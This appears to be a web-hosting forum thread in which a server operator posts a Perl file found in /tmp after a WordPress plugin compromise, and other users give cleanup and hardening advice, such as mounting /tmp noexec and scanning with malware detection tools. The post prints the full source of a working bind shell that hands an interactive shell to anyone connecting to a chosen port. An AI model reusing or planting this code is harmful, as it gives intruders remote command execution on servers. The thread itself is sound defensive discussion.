New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
bp.pl in /tmp folder
Hi,
I run a cpanel server and host a few customers.
I noticed following bp.pl file /tmp folder today..
#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
accept(CONN,S);
if(!($pid=fork)) {
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}
Seems to be some kind of shell..
I tried lmd scanning the user owning the bp.pl file and observed that it is hacked thru his plugin.
I have suspended the user now and contacted him.
what is this shell? what else I should do now?
thanks for all your time.
Comments
This may help http://0xa.li/some-interesting-malicious-php-files/
Thanks for help @alegeek
I observed the php shell script date in wp plugin folder and bp.pl file date and both of them are same(today).
what else I can check? Is it possible to see if the bp.pl file is still getting any connections?
ps faux
Delete file, inform user to remove or update plugin.
@jarland thanks. I already did that.
and also secure /tmp and /var/tmp folders.
My servers got hacked and they used a bitcoin mining script, and the issue was that they had uploaded the script to the /tmp folder and managed to start it.
Read more here...
thanks all for valuable inputs. I'm going thru them.
Maldet maybe able to detect these types of scripts
https://www.rfxn.com/projects/linux-malware-detect/
Lock down that tmp folder! Definitely a shell of some sort. The tmp should have limited access from the get go.
lmd is already installed. i'm reading on mounting /tmp with no exec on openvz vps.
@oneilonline Should /tmp be set to noexec, or is there a better way to lock it down?
On my servers I mount /tmp and /var/tmp as tmpfs with flags noexec, nosuid, nodev. This should improve security. I believe that the noexec flag will require a pre-invoke remount setting for apt-get if you use debian derivatives, so that it can work correctly.
Beat me to it...Yes, exactly as mentioned.